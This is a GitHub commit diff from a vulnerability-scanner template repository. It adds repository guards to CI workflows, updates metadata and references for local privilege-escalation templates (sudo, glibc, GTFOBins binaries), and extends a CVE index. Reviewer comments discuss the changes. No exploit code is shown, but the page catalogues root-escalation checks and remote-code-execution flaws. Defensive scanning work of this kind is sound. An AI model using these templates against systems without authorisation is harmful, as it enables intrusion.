Merge branch 'main' into add-missing-token

patch-1
Dhiyaneshwaran 2024-03-04 22:50:45 +05:30 committed by GitHub
commit 27ead949cf
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
139 changed files with 786 additions and 544 deletions


@ -1,22 +0,0 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
- name: Yamllint
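Review bot: The job-level guard `if: github.repository == 'projectdiscovery/nuclei-templates'` carries no comment saying what it is for, and the same literal is repeated in every other workflow section on this page (the three further `build` jobs, `triggerRemoteWorkflow` and `Update`). A line such as `# Run only in the upstream repository; forks and mirrors skip this job` above it would do. The guard only stops the job from running in other repositories; it does not limit who can trigger it upstream, so it should not be read as protection for any secret the job uses. In `triggerRemoteWorkflow` the condition sits before `runs-on:` while the other jobs place it after, so one order should be chosen. The +/- markers are lost on this page, so that this is the added line is inferred from the hunk counts, and the job body continues outside the hunk.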


@ -11,6 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -9,6 +9,7 @@ on:
- 'http/cves/2023/CVE-2023-42344.yaml'
- 'http/cves/2023/CVE-2023-45671.yaml'
- 'http/cves/2023/CVE-2023-48777.yaml'
- 'http/cves/2023/CVE-2023-6895.yaml'
- 'http/cves/2024/CVE-2024-0305.yaml'
- 'http/cves/2024/CVE-2024-0713.yaml'
- 'http/cves/2024/CVE-2024-1021.yaml'
@ -25,7 +26,9 @@ on:
- 'http/default-logins/ibm/ibm-dcec-default-login.yaml'
- 'http/default-logins/ibm/ibm-dsc-default-login.yaml'
- 'http/default-logins/ibm/ibm-hmc-default-login.yaml'
- 'http/default-logins/ibm/imm-default-login.yaml'
- 'http/exposed-panels/c2/meduza-stealer.yaml'
- 'http/exposed-panels/cisco-unity-panel.yaml'
- 'http/exposed-panels/connectwise-panel.yaml'
- 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml'
- 'http/exposed-panels/ibm/ibm-dcec-panel.yaml'
@ -38,6 +41,7 @@ on:
- 'http/exposed-panels/opinio-panel.yaml'
- 'http/exposed-panels/rocketchat-panel.yaml'
- 'http/exposures/configs/sphinxsearch-config.yaml'
- 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml'
- 'http/misconfiguration/installer/connectwise-setup.yaml'
- 'http/technologies/ibm/ibm-decision-runner.yaml'
- 'http/technologies/ibm/ibm-decision-server-runtime.yaml'
@ -49,6 +53,7 @@ on:
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
if: github.repository == 'projectdiscovery/nuclei-templates'
runs-on: ubuntu-latest
steps:
- name: Trigger Remote Workflow with curl


@ -6,6 +6,7 @@ on:
jobs:
Update:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Check out repository code
uses: actions/checkout@v4


@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml
http/cves/2023/CVE-2023-42344.yaml
http/cves/2023/CVE-2023-45671.yaml
http/cves/2023/CVE-2023-48777.yaml
http/cves/2023/CVE-2023-6895.yaml
http/cves/2024/CVE-2024-0305.yaml
http/cves/2024/CVE-2024-0713.yaml
http/cves/2024/CVE-2024-1021.yaml
@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml
http/default-logins/ibm/ibm-dcec-default-login.yaml
http/default-logins/ibm/ibm-dsc-default-login.yaml
http/default-logins/ibm/ibm-hmc-default-login.yaml
http/default-logins/ibm/imm-default-login.yaml
http/exposed-panels/c2/meduza-stealer.yaml
http/exposed-panels/cisco-unity-panel.yaml
http/exposed-panels/connectwise-panel.yaml
http/exposed-panels/fortinet/fortiauthenticator-detect.yaml
http/exposed-panels/ibm/ibm-dcec-panel.yaml
@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml
http/exposed-panels/opinio-panel.yaml
http/exposed-panels/rocketchat-panel.yaml
http/exposures/configs/sphinxsearch-config.yaml
http/misconfiguration/cloudflare-rocketloader-htmli.yaml
http/misconfiguration/installer/connectwise-setup.yaml
http/technologies/ibm/ibm-decision-runner.yaml
http/technologies/ibm/ibm-decision-server-runtime.yaml


@ -32,3 +32,6 @@ files:
- http/cves/2020/CVE-2020-28351.yaml
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
- http/cves/2021/CVE-2021-28164.yaml
- http/fuzzing/wordpress-themes-detect.yaml
- http/fuzzing/mdb-database-file.yaml
- http/fuzzing/iis-shortname.yaml


@ -9,11 +9,22 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.34299
epss-percentile: 0.96958
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
vendor: sudo_project
product: sudo
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true
@ -36,4 +47,4 @@ code:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950
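Review bot: The reference URLs that appear to be added under `reference:` (two `lists.opensuse.org` entries and one `packetstormsecurity.com` entry) use plain `http://` while the entries above them use `https://`; the same holds for the `packetstormsecurity.com` links in the CVE-2021-3156 section and the `www.openwall.com` links in the CVE-2023-4911 section. Prefer the TLS form, e.g. `- https://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html`, so that someone following a reference from a scan report is not sent over cleartext. Separately, `tags:` still ends in `canonical` although the vendor/product pair now reads `sudo_project`/`sudo` to match the `cpe`; if that tag only mirrored the old vendor it can probably be dropped. The +/- markers are lost on this page, so which lines are new is inferred from the hunk counts.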


@ -10,8 +10,20 @@ info:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-3156
cwe-id: CWE-193
epss-score: 0.97085
epss-percentile: 0.99752
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: sudo_project
product: sudo
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
self-contained: true
@ -28,4 +40,4 @@ code:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950


@ -21,8 +21,8 @@ info:
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.00047
epss-percentile: 0.14754
epss-score: 0.00174
epss-percentile: 0.53697
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ code:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950


@ -10,16 +10,21 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- https://www.youtube.com/watch?v=1iV-CD9Apn8
- http://www.openwall.com/lists/oss-security/2023/10/05/1
- http://www.openwall.com/lists/oss-security/2023/10/13/11
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-4911
cwe-id: CWE-787
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
cwe-id: CWE-787,CWE-122
epss-score: 0.0171
epss-percentile: 0.87439
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
self-contained: true
code:
@ -34,4 +39,4 @@ code:
- type: word
words:
- "139" # Segmentation Fault Exit Code
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950


@ -9,15 +9,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- https://access.redhat.com/security/cve/CVE-2023-6246
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-6246
cwe-id: CWE-787
cwe-id: CWE-787,CWE-122
epss-score: 0.00383
epss-percentile: 0.72435
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,linux,privesc,local
self-contained: true
@ -33,4 +39,4 @@ code:
- type: word
words:
- "127" # Segmentation Fault Exit Code
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
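Review bot: The matcher line `- "127" # Segmentation Fault Exit Code` pairs a value and a comment that do not agree: a shell reports a process killed by SIGSEGV as 139 (128+11), which is what the CVE-2023-4911 template on this page matches, while 127 is the conventional "command not found" status. The line is unchanged context in this commit and the `code:` source sits outside the hunk, so this is a question rather than a confirmed bug. If the status is echoed by a shell, a host where the probed binary is simply missing could be reported as vulnerable. Until that is checked, the comment could read `# TODO confirm: 127 is "command not found"; SIGSEGV would be 139`.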


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/choom/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,choom,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/find/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,find,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/lua/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,lua,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/mysql/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,mysql,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/node/
metadata:
max-request: 4
verified: true
max-request: 4
tags: code,linux,node,privesc,local
self-contained: true
@ -53,4 +53,4 @@ code:
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/rc/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,rc,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950


@ -8,8 +8,8 @@ info:
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,run-parts,privesc,local
self-contained: true
@ -45,4 +45,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/strace/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,strace,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/torify/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,torify,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/view/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,view,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/xargs/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,xargs,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950


@ -7,8 +7,8 @@ info:
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
max-request: 2
verified: true
max-request: 2
tags: code,linux,privesc,local
self-contained: true
@ -42,4 +42,4 @@ code:
words:
- "Not readable and not writable"
negative: true
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950


@ -265,6 +265,7 @@
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@ -2170,6 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2279,14 +2281,17 @@
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
